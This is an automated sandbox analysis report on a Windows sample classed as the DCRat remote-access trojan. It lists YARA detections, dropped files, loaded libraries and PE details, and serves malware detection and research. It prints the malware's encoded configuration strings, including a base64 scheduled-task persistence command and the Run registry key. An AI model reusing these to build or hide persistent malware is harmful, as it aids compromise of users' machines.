            Source: Yara matchFile source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPED

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347767523_2_00007FFD34776752
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347706003_2_00007FFD34770600
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347759A63_2_00007FFD347759A6
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347705303_2_00007FFD34770530
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347706703_2_00007FFD34770670
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347704983_2_00007FFD34770498
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeCode function: 3_2_00007FFD347704B83_2_00007FFD347704B8
            Source: XWormUI[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
            Source: RuntimeBroker.exe.0.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 3.0.RuntimeBroker.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: 00000003.00000000.2173837580.0000000000612000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000003.00000002.4612955259.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000003.00000002.4613580739.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: Process Memory Space: RuntimeBroker.exe PID: 3420, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
            Source: XWormUI[1].exe.0.dr, Settings.csBase64 encoded string: 'GTHkLv0n511+WFpCgaIiGdRg/5G+3ytjrl/pqaY5CC2/uoO7K63FU/HqTRgvagOQtqISVXBmopa+YikE2q7k2A==', 'yG/yJG+weDZb+1BCsj7T1vOtGTzoLGcZlgUuzY4i6eB2zN++gblv+Sy1KaSOyI7zHOsPVSIziLhkSApTKNusEA==', 'G0wvQTaFpIOVvlizDxu9mxRqVtbfwSna3TYgcRtfsT/wgr3H7864L2MvfNYh0oIH/vYtRZlULU2m4MMSltPtCBtUcR6ZxbGlt5/uM0zXsqI=', 'v2QPjp9rv3730twen7gDKy2Z0TbIAgdDkmCZV1FF7Pm3rYtBxEQFgB3SWV01FAqgNdYurlMN0qSLmijprs81LXQSyigtToxUgc1gaVIiOUf0BxK7GCMJP4XT/fMNW0HlNZ0ePvSyetvKVfZoxZnFi8jFtO4e+TWOrkHko0P9fU3E3OtEInxD+pzvXODO5FC1wEB96ep75aKYPWlhUmdAZMZO/rqE1Rd0Yhup/NZxkzIa1zg5tJFTNvE02MI57d3xB2CVQwY9eytckk50b5Khc1CbDvnzUvxf+m4sjn+X2nKGCiFPYPqJXw7vqOVy927uGnYxwRIjyFOEUyGOETFs8FzGDXBbPw6beiKG3+ItGd5aUSGwOBUXZGcWyBSpZ/sieQuoNOosBuu3aJpmH26mZOv7Bp2bSFYyJtUOEbKa871wf48RbRhi/aHxwiFgndMJdblQr5FTVzpP8gEq/kGr1c17M2soKoqv51PT3f9+S+iFYhwuHgZ+2VMT4B183UJ4B7Gi/33IE6dr07gqrYhBd/im4dm4WOVFTVWV42ED1RN4RcevpNpydXuKMbMTuyWHJVMZdnCn4r8bkJ2JR9jNoqPtSRzKZZbuU7ZijPY1HkLiFq2rt+qiV8ATzTACrjzqUXK6QOFrgJQm4/we/gYs8XvO386/iCVDC5K1laPQR+tmxlBGo7XZDAbIPulIcZ3m3Uxu1Nbq7W7LR5WeUf/sN2oTtrukWij7Mrk8XYVNl69RS4FPBzL9r2+vpDQMKiFyFibqhrdRKuLGtdO0DaC9Pwjr7GsiPbvkJaCEzXXlQnoOKuDp1wBvBanbb0EdOrbpAxJR/zBlyna6pad9m7TWk+AOdV3+XI1aOWx+0Qq4gAiX1Qg5DXR+GRc/oRl9IPdN1teFi4IKtKTHoBmTbO9JuDRTFVZDro7Cr7KXVXYLNG4mCC6ZOJX0Co9tAT74+tioujsBBku2H3X2w1CSfYvcdYFXcDtXLWPeRpPB4ODSBxJ6VylOq7rF/PtEJN7IOFFzoJuY13qLC33qbqXrqv/5xysTsI697kizbShMtoEjUad9H/58X4TQjyFjMaFD8XPi', 'QXWIq7Mq82DWl6IaGIGfv2fY6AnJIfBY9clhTArmEU9DMOgGA+JKXNu6IA1Ei73TEkB+qqmqf6z0Hy+bQpynrA==', 'v0V9G8XWB54VLncZAj0EwVTmn3o387ZdN9snMSgdxzWq/6fqy4DZKsD+A3EybZcbE5SuucIbWm5pnMTiIP4fjQ==', 'K3Nl4TwW4zjsVAO8Zugh18IykcltSuVVF/0YHj0BH7k523w6+kWpoiUYcXSnZt39jVrxVPNWlpmG14OnPnDrPg=='
            Source: XWormUI[1].exe.0.dr, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
            Source: RuntimeBroker.exe.0.dr, Settings.csBase64 encoded string: 'GTHkLv0n511+WFpCgaIiGdRg/5G+3ytjrl/pqaY5CC2/uoO7K63FU/HqTRgvagOQtqISVXBmopa+YikE2q7k2A==', 'yG/yJG+weDZb+1BCsj7T1vOtGTzoLGcZlgUuzY4i6eB2zN++gblv+Sy1KaSOyI7zHOsPVSIziLhkSApTKNusEA==', 'G0wvQTaFpIOVvlizDxu9mxRqVtbfwSna3TYgcRtfsT/wgr3H7864L2MvfNYh0oIH/vYtRZlULU2m4MMSltPtCBtUcR6ZxbGlt5/uM0zXsqI=', 'v2QPjp9rv3730twen7gDKy2Z0TbIAgdDkmCZV1FF7Pm3rYtBxEQFgB3SWV01FAqgNdYurlMN0qSLmijprs81LXQSyigtToxUgc1gaVIiOUf0BxK7GCMJP4XT/fMNW0HlNZ0ePvSyetvKVfZoxZnFi8jFtO4e+TWOrkHko0P9fU3E3OtEInxD+pzvXODO5FC1wEB96ep75aKYPWlhUmdAZMZO/rqE1Rd0Yhup/NZxkzIa1zg5tJFTNvE02MI57d3xB2CVQwY9eytckk50b5Khc1CbDvnzUvxf+m4sjn+X2nKGCiFPYPqJXw7vqOVy927uGnYxwRIjyFOEUyGOETFs8FzGDXBbPw6beiKG3+ItGd5aUSGwOBUXZGcWyBSpZ/sieQuoNOosBuu3aJpmH26mZOv7Bp2bSFYyJtUOEbKa871wf48RbRhi/aHxwiFgndMJdblQr5FTVzpP8gEq/kGr1c17M2soKoqv51PT3f9+S+iFYhwuHgZ+2VMT4B183UJ4B7Gi/33IE6dr07gqrYhBd/im4dm4WOVFTVWV42ED1RN4RcevpNpydXuKMbMTuyWHJVMZdnCn4r8bkJ2JR9jNoqPtSRzKZZbuU7ZijPY1HkLiFq2rt+qiV8ATzTACrjzqUXK6QOFrgJQm4/we/gYs8XvO386/iCVDC5K1laPQR+tmxlBGo7XZDAbIPulIcZ3m3Uxu1Nbq7W7LR5WeUf/sN2oTtrukWij7Mrk8XYVNl69RS4FPBzL9r2+vpDQMKiFyFibqhrdRKuLGtdO0DaC9Pwjr7GsiPbvkJaCEzXXlQnoOKuDp1wBvBanbb0EdOrbpAxJR/zBlyna6pad9m7TWk+AOdV3+XI1aOWx+0Qq4gAiX1Qg5DXR+GRc/oRl9IPdN1teFi4IKtKTHoBmTbO9JuDRTFVZDro7Cr7KXVXYLNG4mCC6ZOJX0Co9tAT74+tioujsBBku2H3X2w1CSfYvcdYFXcDtXLWPeRpPB4ODSBxJ6VylOq7rF/PtEJN7IOFFzoJuY13qLC33qbqXrqv/5xysTsI697kizbShMtoEjUad9H/58X4TQjyFjMaFD8XPi', 'QXWIq7Mq82DWl6IaGIGfv2fY6AnJIfBY9clhTArmEU9DMOgGA+JKXNu6IA1Ei73TEkB+qqmqf6z0Hy+bQpynrA==', 'v0V9G8XWB54VLncZAj0EwVTmn3o387ZdN9snMSgdxzWq/6fqy4DZKsD+A3EybZcbE5SuucIbWm5pnMTiIP4fjQ==', 'K3Nl4TwW4zjsVAO8Zugh18IykcltSuVVF/0YHj0BH7k523w6+kWpoiUYcXSnZt39jVrxVPNWlpmG14OnPnDrPg=='
            Source: RuntimeBroker.exe.0.dr, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
            Source: XWormUI[1].exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: XWormUI[1].exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: RuntimeBroker.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: RuntimeBroker.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@2/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMutant created: NULL
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\RuntimeBroker.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeFile created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to behavior
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeReversingLabs: Detection: 44%
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeVirustotal: Detection: 58%
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: msvcp140.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb%% source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
            Source: Binary string: C:\Users\erays\source\repos\seftali\x64\Release\seftali.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
